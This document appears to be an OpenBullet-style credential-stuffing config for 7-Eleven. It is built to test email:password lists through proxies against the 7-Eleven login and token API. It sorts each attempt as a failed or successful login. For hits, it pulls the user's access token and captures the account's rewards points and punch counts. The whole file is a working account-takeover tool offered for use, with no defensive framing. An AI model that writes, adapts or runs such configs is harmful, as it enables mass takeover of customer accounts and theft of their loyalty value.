[SETTINGS]
{
  "Name": "7Eleven",
  "SuggestedBots": 40,
  "LastModified": "2018-06-21T13:26:41.0912693+00:00",
  "AdditionalInfo": "",
  "Author": "DADEX55",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.7-eleven.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
REQUEST POST "https://api.7-eleven.com/auth/token/" AutoRedirect=TRUE 
  CONTENT "{\"client_id\":\"OUp5z7I9y3HNDcyl5dwLSG5XkhulFUtsBfzwdpQU\",\"grant_type\":\"password\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.7-eleven.com/login" 
  HEADER "Origin: https://www.7-eleven.com" 
  HEADER "X-SEI-TZ: +00:00" 
  HEADER "X-SEI-VERSION: 3.5.7" 
  HEADER "X-SEI-PLATFORM: us_web" 
  HEADER "X-SEI-TRIP-ID: NmI0YTVhMWQzMDBhNTc4YWQ1YTQzMjkyNmYzOGYwMGI=" 
  HEADER "Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "invalid_login" 
    KEY "The Email / Password combination is not valid." 
  KEYCHAIN Success OR 
    KEY "token" 
#PARSE_TOKEN PARSE "<SOURCE>" JSON "access_token" Recursive=FALSE -> VAR "token" "" "" 
#GET_REQUEST REQUEST GET "https://api.7-eleven.com/v4/users/me/?sync=true" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "X-SEI-TZ: +02:00" 
#Points_Capture PARSE "<SOURCE>" JSON "rewards_points" Recursive=FALSE -> CAP "Points" "" "" 
#Punches_Capture PARSE "<SOURCE>" LR "punches_earned\":" "}" Recursive=FALSE -> CAP "Punches Earned" "" "" 
